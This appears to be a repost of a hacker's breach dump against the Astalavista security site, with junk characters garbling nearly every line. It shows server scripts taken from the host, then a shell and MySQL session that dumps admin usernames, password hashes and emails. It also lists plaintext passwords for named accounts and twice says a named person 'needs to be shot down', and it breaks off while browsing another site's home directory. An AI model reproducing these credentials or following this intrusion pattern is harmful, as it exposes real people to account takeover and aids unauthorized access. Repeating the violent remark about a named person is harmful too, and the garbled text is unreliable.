J: H- \( ?+ a4 i4 \5 e <channel>
2 z; ^% z# L) C4 P <title>ASTALAVISTA.com - Exploits</title>, r$ o! c( s; d6 v: X: r
<link>http://www.astalavista.com/exploits</link>
. | }, Y1 j/ G1 x <description>All availably Exploits.</description>
9 T+ p9 ~0 P( j: ~% V: p <language>en-us</language>7 |# Y6 I" ]; L/ d, I
<lastBuildDate>’ . date(’F, j M Y H:i:s O’) . ‘</lastBuildDate>
7 L# \' R$ F$ `5 k <docs>http://blogs.law.harvard.edu/tech/rss</docs>% z2 }' L7 E) q2 M
<generator>Astalavista.com</generator>
$ ~4 R- A' R0 M: n- Y% L <webMaster>info@astalavista.com</webMaster>’ . $items . ‘
( O1 |! G( b& A/ Q1 ^' U' G </channel>
$ m6 ~ s$ E5 F. J# A( ?0 U: R</rss>’;2 @/ Z0 j* G$ g1 W- x, f
B) z* E9 @/ p5 `# n
if (file_exists(FULLPATH . ‘/feed/exploits.xml’)) {
$ c& ], r9 p, q unlink (FULLPATH . ‘/feed/exploits.xml’);4 Z- b! m7 v1 S9 R- `: I' g4 ?
}
/ ^3 \+ B% s ]( K* ~( \2 Q, q* h" P/ R& V" q2 n% a
file_put_contents(FULLPATH . ‘/feed/exploits.xml’, $xml);: z( Q5 |/ ?. L" r! k7 |
[snip]# p! n8 p5 M+ X/ P" F1 v
9 k# v& d, u) e. Q6 e8 U8 F$ Y
sh-3.2$ cat exploits.sh. _9 o' U8 P9 s" {
#!/bin/sh E* ~/ h! G; K- @) Z
; e4 ~' L1 _4 y###########################################################) y7 K( X+ d, z& E& A3 @
# #+ L! Y! G6 M6 B, d5 i
# Title: milw0rm exploits adder #. }' Q' |% g, l, z( |( k3 Z
# Description: Add all milw0rm exploits to the #
0 Y8 }: \7 W6 l! B; d% a/ T% h# Astalavista.com database #
6 s3 m) s3 \ T3 Z# N+ G: D# #
) {$ d9 W K% ]. g# Company: Astalavista Group #0 ^3 j: g) b3 Z# s+ }9 l/ ~ y+ b
# Author: Paulo M. Santos #. W @; x* X* g+ {
# E-Mail: 链接标记paulo.santos@astalavista.ch #6 p/ i9 w$ m. R8 X( t) b8 B p6 q
# #
- ~. B, l7 B$ z" x4 H###########################################################
" O! o+ C( T$ i" R0 Q- E v! T# f, y! d) z- Y! [% ?9 N
# path
0 `5 \3 ^9 P, F" F. @this_path=/home/com/public_html/modifications/cronjobs
5 I% N7 k; g8 i
, V2 K- f9 k3 S# change directory
" C; K. H; |7 h+ Kcd $this_path
5 n6 s) K' B0 ?- g3 Lcd tmp/
+ i; H8 p% u2 Y+ W
- p( Y2 k. N2 C* z+ j# delete files+ B5 I- D5 R* ?0 |- \7 \0 R2 j X
rm -rf milw0rm.tar.* &
3 x" r8 S5 J% s& Srm -rf milw0rm/ &. W$ ^+ k% Q$ ^" w, N: x! [/ J
) [. z5 l% Z, q( t# wget milw0rm paket
$ m! F. j8 f( {+ u' Jwget 链接标记[url]http://www.milw0rm.com/sploits/milw0rm.tar.bz2[/url]
5 S, N6 f$ a1 v2 i! l% e$ T* w: F& z7 h4 c( ]* @" S
# extract milw0rm paket
, z8 U, w3 D+ s/ ]$ ^: Ttar -xvf milw0rm.tar.bz2
$ |7 h# Q/ k# A. s, D( C1 ?) ^. J% O/ [. C: Y' ~* j
# change owner
' B! v# o! G2 Schown -R com .* C: `( R& O9 a2 _% }* X3 F. K
chgrp -R com .& ^* V2 q" o5 M# `' W5 y7 h
' ], q. k, T/ M: K8 T# execute php script) j' S3 G) z3 b7 n" L. g8 k: ^
cd $this_path
0 n& m# C( E' Lphp -q exploits.php
+ e0 S4 M6 I" S( i& U) f% U F
% Z7 {' ?2 M+ D) o0 S2 b) n# delete files
" t- w& ~ ~% t; \rm -rf tmp/milw0rm.tar.*( S+ t$ r" a& l1 V* O+ s9 |
rm -rf tmp/milw0rm/. N4 @8 \$ W0 L/ m; `3 }( }/ y
+ g( E: H$ ?) v
sh-3.2$ echo “Paulo M. Santos needs to be shot down.”
* I. Z: p P9 q( w) TPaulo M. Santos needs to be shot down.
: Q8 p4 R4 L0 u3 D6 e1 D4 A6 {- S" f0 l
mysql -u contrexxuser2 -p# Q" F& x$ J _) O0 C1 I
Enter password:$ o& v& N5 n3 F' V5 ]
Welcome to the MySQL monitor. Commands end with ; or \g.' Q* i' s! A% T+ w+ ~
Your MySQL connection id is 261694# Z, P. T# w8 L# k1 X ^
Server version: 5.0.45-community-log MySQL Community Edition (GPL), R4 a; F4 O4 { }$ O- s, U
+ P# E6 U: A: U D8 U3 TType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
- D/ _6 z# Z5 n* G, Z/ \: M+ O4 I% Z8 y( ~. g1 u2 B) D% m
mysql> show databases;9 f/ E/ b" m4 F4 ?* o, u
+——————–+
: A7 {1 W& h" y) o! @8 a% D| Database |
; H; Y D7 O4 I6 J+——————–+
h3 C \: L! E# z; K+ y| information_schema |, o; U6 B2 e9 Y2 P
| com_contrexx2 |$ b4 {/ f9 k/ }2 `- r/ ]! q. c
| com_contrexx2_live |: r9 h* d- x/ t, W' m# ^
| test |
$ ]3 }0 a$ ?) U I1 h+ _# ]: U+——————–+
4 y/ q7 s. r/ G3 n; Q! N7 g* l c4 rows in set (0.00 sec)
* ]" u% } i Y# d; o3 I R' Z
+ ^% K9 T9 @* O0 Ymysql> use com_contrexx2_live
9 ^3 S) N U& `, X6 ^Database changed; x, Z$ k) H4 Z3 M
mysql> show tables;+ D+ n: u/ H5 |5 _$ M
+————————————————–+ d a+ {( b! W" U0 e& z2 c
| Tables_in_com_contrexx2_live |, C' V; g; L: e+ [
+————————————————–+; i( d9 U/ O5 I# s- W- d
| cc_banner_counter |! z8 m: V2 g1 v. d& v. u5 Q) N
| cc_search_counter |
, e0 t2 X; P, d* W( J5 A. K1 H/ K| contrexx_access_group_dynamic_ids |
$ u9 \7 d* r5 `4 V| contrexx_access_group_static_ids |
. h+ m I, }+ m| contrexx_access_rel_user_group |# @7 V, f! q' ~3 \' _: @
| contrexx_access_settings |; F8 I2 n F" b8 E0 K$ N
| contrexx_access_user_attribute |4 L+ D, u- R7 D0 B J7 X8 m# U
| contrexx_access_user_attribute_name |( U2 N) Y- l5 I( F" a3 _* B
| contrexx_access_user_attribute_value |1 t1 s6 I% T( V: v/ w+ a# e
| contrexx_access_user_core_attribute |
, x) F [3 O+ \& F( Y1 ?| contrexx_access_user_groups |
) j' @" B5 V! ^& |0 k, M7 E| contrexx_access_user_mail |
+ l! a( X2 p" h/ U$ _0 \2 a| contrexx_access_user_profile |! [) x) p4 i2 p9 x. J) \0 l; k
| contrexx_access_user_title |
3 X) ^# W% I' v5 [5 X| contrexx_access_user_validity |& K) V: x8 V3 m/ l% M2 x$ ]
| contrexx_access_users |
8 S! E- i) O. N. @; h# Y| contrexx_backend_areas |
8 s1 J o( m5 g+ z% T| contrexx_backups |8 X* u2 O& R! g# o( c: W8 g
| contrexx_content |, f, f2 E' \& C$ L( Q
| contrexx_content_history |
6 t: D8 H$ s4 ^3 |) \7 w* v| contrexx_content_logfile |
& t5 Y. c. f3 H( `' o% a| contrexx_content_navigation |# q* ~3 z# L6 g/ Y; f9 R
| contrexx_content_navigation_history |
' _4 H, k: p3 e- I| contrexx_ids |
* d! S' |7 Q. \2 c+ H| contrexx_languages |
3 ~! O# x. I2 J# k7 }| contrexx_lib_country |: ]. j5 d" ~6 o) D1 |
| contrexx_log |
b5 Y$ F7 @; b| contrexx_module_alias_source |/ Q7 t$ K8 G$ m) z6 V8 @0 R
| contrexx_module_alias_target |# L; N$ v& O# w! k
| contrexx_module_block_blocks |
1 o6 D# r4 w: w$ j3 n+ J, W- \| contrexx_module_block_rel_lang |
1 S5 K% n: i& L6 c& Q7 g| contrexx_module_block_rel_pages |3 o+ m& t8 l+ I4 w. u3 S! I
| contrexx_module_block_settings |
- o. g8 F7 }4 w& H' K| contrexx_module_blog_categories |! j9 \. D9 k a1 n2 q7 e Q5 X5 r$ i* I
| contrexx_module_blog_comments |- x! L9 a" E: `1 `8 y6 [. X* h
| contrexx_module_blog_message_to_category |+ t) y/ ~6 K+ l! G
| contrexx_module_blog_messages |
2 b+ q7 p4 z- a x1 P' s$ Y| contrexx_module_blog_messages_lang |
7 F0 c, t' m' @9 N H8 Y/ _| contrexx_module_blog_networks |+ s9 v0 ]) a, Y5 C" V" ]
| contrexx_module_blog_networks_lang |( E9 ]* u. P+ X9 R! I# B' S
| contrexx_module_blog_settings |' |% f' w- L: F6 v @
| contrexx_module_blog_votes |
i) g" I( W0 i$ I" P. H| contrexx_module_calendar |0 x; }. f5 ^7 t E+ x# I1 m" | \
| contrexx_module_calendar_access |
Z5 c/ m1 L' R( t% L| contrexx_module_calendar_categories |
9 }# C8 g& z* ^/ [0 Z& v1 ]| contrexx_module_calendar_form_data |. L: q# m5 p7 R, {& ^
| contrexx_module_calendar_form_fields |
, o+ v: d; d7 h v9 `; m% J, L| contrexx_module_calendar_registrations |
- M' d0 ~' F' {2 Z# k8 }4 || contrexx_module_calendar_settings |4 B+ |, Z9 w# N8 E x/ j4 \- K
| contrexx_module_calendar_style |# P2 v% y9 i6 g8 E+ k j* o
| contrexx_module_contact_form |
, N: l2 `! R. `- P& V| contrexx_module_contact_form_data |
1 F. F/ `8 A. [5 `| contrexx_module_contact_form_field |5 N# k$ m- d0 M7 O
| contrexx_module_contact_settings |2 v1 Q" r5 P0 ]+ I9 C) o1 P
| contrexx_module_data_categories |- o: }: X& M( C! B& ]
| contrexx_module_data_message_to_category |
3 J2 m% a+ x1 t, O" W# f+ e| contrexx_module_data_messages |4 |# c+ } |8 Z5 R! _
| contrexx_module_data_messages_lang |
; @4 T2 `/ ?: t6 p| contrexx_module_data_placeholders |
/ M& r2 o( l1 z- v1 q' P4 H- n4 O| contrexx_module_data_settings |
9 S% ^4 E1 k# X| contrexx_module_directory_access |) G- d6 d: \! t. _
| contrexx_module_directory_categories |
4 u* P- x( z `$ R! o/ \| contrexx_module_directory_dir |2 Q% Z3 C3 o/ ]/ T: Q
| contrexx_module_directory_inputfields |) c$ z b& @& w: j" n, N
| contrexx_module_directory_levels |* t; U# ]1 D1 n, \; J# g% o. k
| contrexx_module_directory_mail |
# T ~& t1 `7 |0 H/ Y+ y% ~. _| contrexx_module_directory_rel_dir_cat |$ x$ H- W+ h7 K/ o4 \( S4 m
| contrexx_module_directory_rel_dir_level |
_0 }. F) H' y" T: Y| contrexx_module_directory_settings |3 }* C# N) s' k8 U$ O" J- ^4 {4 [" ^
| contrexx_module_directory_settings_google |
1 c3 ]7 A0 G, v7 F) I! A| contrexx_module_directory_vote |& ?6 _9 X8 j9 ^1 v2 |' D/ a, C
| contrexx_module_docsys |
% {! H/ a$ x4 X; r+ |9 Z+ O| contrexx_module_docsys_categories |% P' r" S- l ]8 u6 C$ L
| contrexx_module_egov_configuration |
' _0 p. T9 M# u7 Z: e# i, @| contrexx_module_egov_orders |1 [, c1 y1 P# ~& {2 l! }
| contrexx_module_egov_product_calendar |6 ]. X1 _. g' P! ^- `/ k% o/ _
| contrexx_module_egov_product_fields |2 x M$ O9 t( n7 ?
| contrexx_module_egov_products |& T5 g3 t; m% B( {5 v
| contrexx_module_egov_settings |
' L$ f2 g/ A, F, K# Z' Q| contrexx_module_exploits |
' X$ W T! _: h. || contrexx_module_exploits_categories |& R( Z3 T q7 u. p) M' Q0 |% ^
| contrexx_module_feed_category |
: C( k5 S: b& Z7 t) {: g! P, p) T| contrexx_module_feed_news |
& k: H0 _2 p. B P| contrexx_module_feed_newsml_association |
) V" n" p" |* n| contrexx_module_feed_newsml_categories |
5 t/ M0 X9 o% k| contrexx_module_feed_newsml_documents |5 `0 C' j7 d4 }3 u9 Q5 q( y
| contrexx_module_feed_newsml_providers |
% m: z# p! X2 d' J- J$ a4 c| contrexx_module_forum_access |2 r- K& H/ q0 Q3 j
| contrexx_module_forum_categories |
/ U6 y# d8 L: M1 p| contrexx_module_forum_categories_lang |0 l4 r1 _/ C, G3 y; K1 r3 \" X
| contrexx_module_forum_notification |$ ]( X( K9 |# O2 y' {! G
| contrexx_module_forum_postings |
) v( \$ L7 y- e5 k| contrexx_module_forum_rating |
: `$ `0 o( \, {: r% || contrexx_module_forum_settings |7 D7 h }' t2 z5 {/ |
| contrexx_module_forum_statistics |9 e" j0 @: D4 a9 |) p2 E
| contrexx_module_gallery_categories |# X* J! p# q# u, X' e
| contrexx_module_gallery_comments |
' [ `: w0 F5 C) W( r8 Z| contrexx_module_gallery_language |2 O1 w+ e( I k7 l m% J
| contrexx_module_gallery_language_pics |. h1 R; V4 y: P( J
| contrexx_module_gallery_pictures |
# m s6 ?* ` K0 Y+ E0 \7 ~+ Q6 v| contrexx_module_gallery_settings |
4 C% H* V# q9 G0 _& J# f| contrexx_module_gallery_votes |
/ D% i* H8 M- l& |& `| contrexx_module_guestbook |
' g/ w) W% u8 g3 r& Z| contrexx_module_guestbook_settings |2 d P* b2 f/ e; g3 A' x3 Y
| contrexx_module_livecam |
+ q( a4 n. \! ^# d- t) A| contrexx_module_livecam_settings |
0 K4 Q E# o! r| contrexx_module_market |) M. n) Q n' |
| contrexx_module_market_access |
+ A0 r# s" f1 e0 b2 I| contrexx_module_market_categories |
* M+ e& B! Z+ W, V| contrexx_module_market_mail |4 O# \. h9 ]' \
| contrexx_module_market_paypal |
5 u' {$ Q; b& b C" W2 M| contrexx_module_market_settings |
! R$ U( Q" r- y! O' e$ N Z| contrexx_module_market_spez_fields |
& B2 l2 U- a, D6 J6 s| contrexx_module_mediadir_access |
. P8 [, O* T! l: S) b4 f. T/ B! n| contrexx_module_mediadir_categories |+ W- m- }) }' H1 o3 \0 h
| contrexx_module_mediadir_comments |% J+ c* N4 O0 _) M; T
| contrexx_module_mediadir_dir |$ f8 _% D! B+ P0 p
| contrexx_module_mediadir_inputfields |
8 X; I1 b, F+ T. ]' S7 K6 ~8 g| contrexx_module_mediadir_levels |) a+ q: l8 k- ^ @
| contrexx_module_mediadir_mail |- j% J3 K4 F9 i4 W) i; }
| contrexx_module_mediadir_rel_dir_cat |
, {% \ k, g/ W' C/ y| contrexx_module_mediadir_rel_dir_level |
; X# P; O5 p; q| contrexx_module_mediadir_reports |
" G9 ?! B% U1 {; D| contrexx_module_mediadir_settings |1 o3 w1 b. T7 g4 S1 P
| contrexx_module_mediadir_settings_google |9 }8 ~6 p8 b* { J2 {
| contrexx_module_mediadir_vote |
- L5 Y a: c3 B3 e9 X/ J9 Y& L| contrexx_module_memberdir_directories |
- W0 _6 l4 B0 p3 e) Y| contrexx_module_memberdir_name |- ?$ v J6 v$ F: Q/ C" O$ M
| contrexx_module_memberdir_settings |
: _" s8 V! ] @| contrexx_module_memberdir_values |% Q I' N @/ G$ J) B- f
| contrexx_module_nettools_allowed_groups |# u3 a% u! w7 e& L, a- m
| contrexx_module_nettools_settings |
! e1 H" c# y9 Z2 a2 Z) H| contrexx_module_news |/ p0 ]7 {8 G- g2 `! P
| contrexx_module_news_access |9 X6 s; y4 v% g3 E/ K+ Y2 _! H
| contrexx_module_news_categories |
7 u; v% |' w( Q# ?| contrexx_module_news_settings |5 M7 e! X" x2 p& `
| contrexx_module_news_teaser_frame |
1 b: f6 L4 \' w6 G0 g2 _6 l8 s| contrexx_module_news_teaser_frame_templates |* P' N) @ a/ x* `5 k1 M8 x! }& F+ J
| contrexx_module_news_ticker |+ h j2 @& u! `7 u5 w; S5 u6 F
| contrexx_module_newsletter |
% a% G' ?0 k; m$ t A h) s8 ^| contrexx_module_newsletter_attachment |3 w! b7 B0 M3 U% D3 I4 A
| contrexx_module_newsletter_category |& y) V l1 |8 V3 N: J
| contrexx_module_newsletter_confirm_mail | R( H8 H) C+ H: n
| contrexx_module_newsletter_rel_cat_news |+ _7 n2 f6 K5 h
| contrexx_module_newsletter_rel_user_cat |
% H3 }/ D( A" X0 D/ ~| contrexx_module_newsletter_settings |
7 W% i/ `: w0 x4 j| contrexx_module_newsletter_template |
, [0 c7 G* y1 A" z1 c! j| contrexx_module_newsletter_tmp_sending |: q: u" w& d$ z4 K t% n4 Q
| contrexx_module_newsletter_user |- b8 X6 H( q6 ~4 V' b# q
| contrexx_module_newsletter_user_title |/ b' ]" _8 g( Y' o
| contrexx_module_onlinetools_defaultports |4 r7 k2 }, X; |8 y. n
| contrexx_module_onlinetools_defaultports_back |
% s4 H# Y% M3 b- I8 H( Y' l; ^| contrexx_module_onlinetools_geolitecity_blocks |$ u5 A- E4 c" C* t4 Y6 |4 L
| contrexx_module_onlinetools_geolitecity_country |
7 O' Y5 L. _& A2 y| contrexx_module_onlinetools_geolitecity_location |
5 ~" }% k1 }! D& P/ \0 y e* H W; w6 j| contrexx_module_podcast_category |2 t" X/ j- j3 ^* n. m6 |/ Q! _
| contrexx_module_podcast_medium |
6 Z. h+ }# r5 f. ^6 ]/ R/ h& X| contrexx_module_podcast_rel_category_lang |
6 E7 Z% L1 j }: G: D/ T0 T3 w| contrexx_module_podcast_rel_medium_category |
0 p; c7 ]# u2 P( ], L) t# s| contrexx_module_podcast_settings |, B/ b0 {1 R, w: o: o* O
| contrexx_module_podcast_template |* w( o# x0 P2 l0 o7 {
| contrexx_module_proxydb |
% j7 p; O" L* q6 t& A+ y| contrexx_module_recommend |3 @* q3 C' ]% U- o6 }9 h$ d2 t6 t) c; b3 ?
| contrexx_module_repository |9 b6 J( v' H! X; K
| contrexx_module_securitynews_cats |/ Y% C4 g9 b( L* M' t6 _8 a
| contrexx_module_securitynews_feeds |
4 T7 u/ m/ [+ \% H# e* b| contrexx_module_securitynews_news |% z* L. W' f" y( z7 ^7 E3 H& g1 `
| contrexx_module_shop_categories |
, y* Z) a! |' L2 E( g| contrexx_module_shop_config |
4 J) L9 I- t! h9 ^* a) \| contrexx_module_shop_countries |1 o6 S' ~! E( x
| contrexx_module_shop_currencies |5 G# Z9 Z" z* S+ K* c
| contrexx_module_shop_customers |( @+ C3 U: \( q" [
| contrexx_module_shop_importimg |( U# \5 J+ s$ M3 I" C) ^9 {: N
| contrexx_module_shop_lsv |+ d- r* o0 d" W. I
| contrexx_module_shop_mail |2 }/ `7 l6 O# D
| contrexx_module_shop_mail_content |
) P/ E: u8 d2 z% W" f| contrexx_module_shop_manufacturer |
: q8 r& I7 L" e2 R& x' R2 x| contrexx_module_shop_order_items |+ Z1 ^2 ~9 h- |8 R
| contrexx_module_shop_order_items_attributes |
/ b# z% I! ]& E) P- u/ p- x| contrexx_module_shop_orders |% T, Z H. R( X# M. G1 ?( u
| contrexx_module_shop_payment |
+ V' k9 w3 s! L" a* C* N| contrexx_module_shop_payment_processors |' M5 k! b C* B, R7 [$ X
| contrexx_module_shop_pricelists |
6 X/ C5 L3 j/ W" J/ F| contrexx_module_shop_products |+ r# k7 n6 ?0 Z. K' A$ c) l5 i8 I
| contrexx_module_shop_products_attributes |' E5 _$ E" y7 ]% F9 {* J6 D6 C
| contrexx_module_shop_products_attributes_name |
/ L9 S$ l+ b; S' v' [( L9 f| contrexx_module_shop_products_attributes_value |/ h' K* V: g0 J7 M5 ^" s7 z
| contrexx_module_shop_products_downloads |+ u) ?! `. w' \* E- k: ?
| contrexx_module_shop_rel_countries |: {: F3 y9 S K- N' p& M" p& f
| contrexx_module_shop_rel_payment |
5 x ^. X. D- _/ n2 p, b3 h% F| contrexx_module_shop_rel_shipment |$ g- o/ v3 u" r! l! v
| contrexx_module_shop_shipment_cost |
+ T+ z3 ~. S% b| contrexx_module_shop_shipper |" E/ M5 T3 w5 S3 C! K' M
| contrexx_module_shop_vat |
" G' s1 P2 C6 F6 W4 v s| contrexx_module_shop_zones |" A Q5 C3 ]& x' I+ h/ U7 F3 p' T9 ^
| contrexx_module_u2u_address_list |
$ M# y5 {& Z/ Z+ }' t| contrexx_module_u2u_message_log |
) X, ?9 @' M/ W7 ~7 z| contrexx_module_u2u_sent_messages |! ?3 D) X& q9 E( B
| contrexx_module_u2u_settings |
* J7 r3 i; p9 v" L| contrexx_module_u2u_user_log |4 b; r/ P& b3 Y. {) z% h5 w
| contrexx_modules |& }2 B, d- c- T) I' Y
| contrexx_sessions |) j' K' N6 x/ a; t" v( n0 w
| contrexx_settings |# W' b4 ^' `& U/ a
| contrexx_settings_smtp |' h+ b: H8 P. K
| contrexx_skins |
5 b; k: ]8 O r4 D| contrexx_stats_browser |5 c$ ~+ k4 N( U- q) [! w- E
| contrexx_stats_colourdepth |' q2 O8 B7 C5 d( b7 H
| contrexx_stats_config |
% u, b% Q6 K8 ]| contrexx_stats_country |5 J, @% p* D/ F
| contrexx_stats_hostname |
+ {% H% W& p- j0 ]3 _ F5 b| contrexx_stats_javascript |
6 [3 X5 c. e, s: K% ~| contrexx_stats_operatingsystem |
& q K7 t9 g) o| contrexx_stats_referer |0 n6 a6 V' t8 H; h& c
| contrexx_stats_requests |
' q3 a! ]( l2 y1 D2 O$ w: k| contrexx_stats_requests_summary |
7 n8 n* ~! s4 J/ ~9 T# h! Y| contrexx_stats_screenresolution |
3 I" H; N8 g& `! @1 _6 T' l| contrexx_stats_search |
) E9 B7 Q9 _# J# \% [| contrexx_stats_spiders |
2 K0 S* E6 V1 u| contrexx_stats_spiders_summary |
, r# n& Q6 U/ f0 m" H: ]| contrexx_stats_visitors |
: |" Z F6 a2 }6 \; k. H| contrexx_stats_visitors_summary |
5 L0 V( I( w4 }+ J- y| contrexx_voting_additionaldata |* L: r6 S6 ~- k: k6 C: V6 [3 _
| contrexx_voting_email |
( g# J# I' Z- y| contrexx_voting_rel_email_system |
0 Q$ H: ^( k) D% w4 V! o$ x% h| contrexx_voting_results |
3 @0 v! l% U- z; f. G| contrexx_voting_system |4 c L M1 q& l3 n
| foo |
) f) C; U, x* C) `+————————————————–+3 r0 |: s; u, i" ]
227 rows in set (0.01 sec)
z/ A0 j7 D5 k, M
! c. P& H6 T; c nmysql> select count(*) as skids from contrexx_access_users;
& ? _+ p/ v/ a! }% F2 e. q+——-+' Y# W- D+ j2 J$ P
| skids |
. `) T9 V$ X8 h+——-+
. B% p& I) E" u$ _2 F; y% a| 53699 |
, Q! |' {2 O1 D/ z- q+——-+# s0 f% K6 P+ W+ |4 U5 _
1 row in set (0.00 sec)* B3 B+ O, ~: f ^5 z, N/ j
; J5 }% D, l" C$ f A/ n' ~' I
mysql> describe contrexx_access_users;# ]6 U9 `5 c' @3 }
+——————+——————————————+——+—–+————–+—————-+! q! Y, f$ `& a6 O" w" R
| Field | Type | Null | Key | Default | Extra |* A, n |" {) V0 U: W0 T
+——————+——————————————+——+—–+————–+—————-+
" r2 U# e% Z' Z7 a* m- G| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
6 E; q/ B% Z, X$ g5 E2 D" Z. i, a| is_admin | tinyint(1) unsigned | NO | | 0 | |/ u. x9 D' }- ?, v6 s: w+ ^* c
| username | varchar(40) | YES | MUL | NULL | |$ K2 j, e7 F% W# ^' H
| password | varchar(32) | YES | | NULL | |% S( c# K( Y1 e( {
| regdate | int(14) unsigned | NO | | 0 | |. A( S( E% @5 N* p
| expiration | int(14) unsigned | NO | | 0 | |
( Q0 b$ ?* }% j4 R0 ~| validity | int(10) unsigned | NO | | 0 | |) H* \; b2 ^' `. Q7 T
| last_auth | int(14) unsigned | NO | | 0 | |& s' |) o1 B- g1 @! j" t8 |
| last_activity | int(14) unsigned | NO | | 0 | |
" \6 ?* e5 m1 h2 s" W" h| email | varchar(255) | YES | | NULL | |: { r: U! i* Q# }$ a0 v
| email_access | enum(’everyone’,'members_only’,'nobody’) | NO | | nobody | |; B3 j2 s$ B% Y {
| frontend_lang_id | int(2) unsigned | NO | | 0 | |
4 }$ t `# F5 k, I/ k9 }/ }+ f| backend_lang_id | int(2) unsigned | NO | | 0 | |% [& X: m0 B/ |, M
| active | tinyint(1) | NO | | 0 | |
/ C( r. l {3 O' z9 n9 h( n| profile_access | enum(’everyone’,'members_only’,'nobody’) | NO | | members_only | |+ ?* t4 D0 H% I' X* E9 N5 k% t* r
| restore_key | varchar(32) | NO | | | |
; ~6 C+ F9 m7 F ~| restore_key_time | int(14) unsigned | NO | | 0 | |1 d* _0 F" Z* Q o+ C! Z# t
| u2u_active | enum(’0′,’1′) | NO | | 1 | |' ]$ h c7 S" e- v
+——————+——————————————+——+—–+————–+—————-+6 t' K$ ^. u3 W0 E' T
18 rows in set (0.00 sec)/ v9 T- @5 Z8 ]4 S; u8 K6 C
5 R. d; @) }. K0 Bmysql> select username,password,email from contrexx_access_users where is_admin = 1;5 [1 l3 e% E( s$ K# f1 \
+————+———————————-+—————————–+
' p+ Z& |4 U7 S2 i| username | password | email |
$ b$ f! c8 J2 @4 a$ _+————+———————————-+—————————–+
: C8 u5 M9 `( R* M7 I( c4 o) V| system | 0defe9e458e745625fffbc215d7801c5 | 链接标记info@comvation.com |
3 i; A, T7 T" `5 X1 }| prozac | 1f65f06d9758599e9ad27cf9707f92b5 | 链接标记prozac@astalavista.com |
" C/ b$ s1 I: h0 @3 g| Be1er0ph0r | 78d164dc7f57cc142f07b1b4629b958a | 链接标记paulo.santos@astalavista.ch |
: S5 j5 ?* I* H d| schmid | 0defe9e458e745625fffbc215d7801c5 | 链接标记ivan.schmid@comvation.com |
D" l7 f& T" P% b& {+————+———————————-+—————————–+
$ E5 o4 W" E3 {! D& o4 rows in set (0.04 sec)
; i1 ^3 L/ [$ ?) s6 n6 T
2 [; o9 e1 C, Hmysql> exit;
$ L: W. r4 j. ?4 F/ @0 T$ i$ HBye# P5 k7 e7 t3 p" K. `1 s! h) E
) h% a6 k% E9 h) u
[~] There you go, your “team of security and IT professionals” is a joke., s1 p% j% v4 X# r# x) s N
. K% ~7 z- P" `5 F
+——————————+1 E6 E; _2 x" J
system:f82BN3+_*
$ X1 B0 H4 S ZBe1er0ph0r:belerophor4astacom& `1 t: M) s, z* A/ I0 ?
prozac:asta4cms!
! ~9 z, @2 t9 b, Qcommander:mpbdaagf6m C# c7 B2 E5 a. K
sykadul:ak29eral/ F7 G7 x; s+ U1 n8 c" k* a6 K2 c
+——————————+' L/ Q1 s* k3 c9 ~0 Z" [
! w! W$ t- j, A9 V" T( j
[~] Paulo M. Santos AKA Be1er0ph0r needs to be shot down for his milw0rm ripping script(s): w8 U$ q! l0 I; b3 V8 a
…and the others, find another area to get paid from, security isn’t for sale and you obviously fail at it.
8 C1 E$ }2 j8 }3 V7 t0 F
( Y( h2 s( [0 P( S$ V1 z[~] Lets move to astalavista.net now,
3 C9 D P/ y5 P! F( W* \' s: \& E. k" O+ Q+ G7 p1 J
From <链接标记[url]https://www.astalavista.net/[/url]>:% _7 X, H4 D3 d6 U, n" G- R
>> Everyone knows that the best defense is a good offense.: Q/ i+ s- h5 ], |0 E
>> Those who wait for their foes to find a security loophole are opting for the wrong strategy.% I) i6 D! O& |5 X
>> The ASTALAVISTA hacking & security community is the largest IT security community in the world.; z* b0 x0 T- z* X
>> It.s a platform for both IT specialists and novices, and anyone interested in expanding and updating their knowledge regarding IT security and hacking.”9 b$ C; ^+ N Y2 X) N0 b2 _
* g. `) X; u: x( q* Y4 U>> Go ahead, try and hack our server . in a completely legal way!
3 n" z# M3 F; o$ Y3 I, F>> Learn by doing: We offer our members tricky tasks and challenges on an
% Z6 M3 ]" S8 B>> ongoing basis so you can test your knowledge and abilities. You can also" J( `; H; M8 G+ C0 p n1 l
>> demonstrate what you.ve mastered by taking part in regular hacker contests
, w2 d' i& d# T* e5 q>> and war games
: b3 }6 ~# h: U' |
) C# }$ [& M! r3 Y1 e[~] Lets take a look there, after all… they are hack-proof, aren’t they?!* B) X1 Y. H- Q7 p( S4 p- \
/ V! O0 ?+ C8 `) V# [; W( s q
[-] Tricky task: Find home dir of astalavista.net
7 A$ @- I# F; J, h! D! v" i% e: V$ c. D& Y3 V
sh-3.2$ ls -la ~astanet8 R0 C- D8 }8 F9 @2 L
total 48
0 Z& A% ^& w* F# j8 l e) m! }* Qdrwx–x–x 6 astanet astanet 4096 Dec 23 15:55 .8 S! l1 m' t8 k: }, Z$ W( I
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..$ q W- t4 |6 k2 M( d4 @3 }
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
* W5 b. i7 ~& n" L3 e$ X" b% m0 n9 D-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history# A/ ?) v# d) X8 ^
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
/ c0 c$ Z% r8 Q9 ]% K-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile
$ H( K9 j3 ], E-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
' D, y& w" I4 q1 h# n& fdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
( |2 U* Q! ~* W1 w2 Hdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap7 A6 V3 M7 \9 C: d1 a
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
4 j$ F4 n& I6 V7 Z# ^lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
3 r+ C3 C) d0 `, W3 D; x-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
8 X# \4 ~$ h4 R: r" x5 u
$ f/ I [% C+ m' z5 R7 z# W! Z* h- }sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/
) Z+ j j. M7 a( w8 P) _sh-3.2$ ls -la
0 v6 d# h. L3 B# A4 Y3 itotal 200" N% A9 R& \' O+ p) b
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 .
- G; o% p: K- S$ x. A, B$ Mdrwx–x–x 8 astanet astanet 4096 Dec 23 13:53 ..! g% F, M; F8 O/ ?1 C
